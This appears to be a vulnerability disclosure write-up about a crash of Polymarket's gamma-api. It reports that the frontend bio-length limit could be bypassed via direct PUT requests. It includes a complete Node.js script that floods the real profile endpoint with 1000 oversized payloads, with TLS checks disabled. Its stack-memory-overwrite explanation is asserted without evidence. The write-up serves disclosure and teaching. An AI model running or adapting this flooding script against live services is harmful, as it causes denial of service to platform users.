Pentesting Polymarket
Impact
Complete crash of gamma-api.polymarket.com — Polymarket's prediction market API — causing full service disruption for all platform participants.
Vector
Frontend 200-char limit bypassed via direct API call → oversized bio payload (90,999 chars, non-string data) → stack memory overwrite in webserver process → API crash
Fix
Server-side input validation enforced on the bio field; payload size and type sanitized at the API layer; stack memory corruption path eliminated.
About Polymarket
Polymarket is a decentralized information market platform that allows users to trade on the outcomes of real-world events using blockchain technology. Participants can create markets around various topics, such as elections or sports results, and trade shares based on their predictions. The price of shares reflects the perceived probability of a particular outcome, and after the event occurs, the market settles with payouts for those who predicted correctly. Polymarket operates using the PMK token for governance and staking, ensuring a transparent, decentralized trading experience.
Polymarket, a prominent prediction market platform, recently faced a critical vulnerability in its profile sanction mechanism. This flaw allowed attackers to inject a substantial amount of extraneous "junk" data into the database and API interface, leading to potential crashes and service disruptions. This case study delves into the technical details of the vulnerability, its exploitation, and the resulting impact on the platform.
Vulnerability Overview
The vulnerability resides in the profile sanction mechanism of Polymarket's API, specifically within the user profile creation and bio editing functionality. By exploiting this flaw, an attacker can generate excessive data payloads, overwhelming the database and API interface (gamma-api.polymarket.com). This can lead to a complete crash of the platform.
Affected Endpoints:
https://gamma-api.polymarket.com/profiles/${ID}(HTTP Method: PUT)https://gamma-api.polymarket.com/
Exploitation Details
The flaw was identified in the process of creating or editing a user's bio. While the frontend HTML/JavaScript interface imposes a 200-character limit on the bio field, the API lacks proper validation for input size and type. This oversight allows attackers to bypass the frontend restrictions and submit malicious payloads directly to the API.
Through the API directly
Initial exploit testing:
Within large payload consisting of non-string data (e.g., & characters) was submitted to the bio field. This payload bypassed the server's validation checks and was successfully processed, resulting in a 204 No Content response with a significant delay, By repeatedly sending crafted HTTP requests with the large payload to the https://gamma-api.polymarket.com/profiles/${ID} endpoint, an attacker can cause the webserver process to overwrite parts of its stack memory. This manipulation alters the request handling flow, leading to a crash of the API interface.
const axios = require('axios');
const jsonData = { bio: '%'.repeat(90999) };
async function sendRequest() {
try {
const response = await axios.put('https://gamma-api.polymarket.com/profiles/ID', jsonData, {
httpsAgent: new (require('https').Agent)({ rejectUnauthorized: false })
});
console.log(response.data);
} catch (error) {
console.error('Error:', error.message);
}
}
const numRequests = 1000;
const interval = 100;
let requestCount = 0;
const intervalId = setInterval(() => {
if (requestCount < numRequests) {
sendRequest();
requestCount++;
} else {
clearInterval(intervalId);
console.log('All requests sent.');
}
}, interval);
Conclusion
This case study highlights the importance of robust input validation and memory management in API design. The Polymarket vulnerability serves as a reminder that even seemingly minor oversights can lead to significant security incidents. By addressing these issues, organizations can safeguard their systems against similar exploits.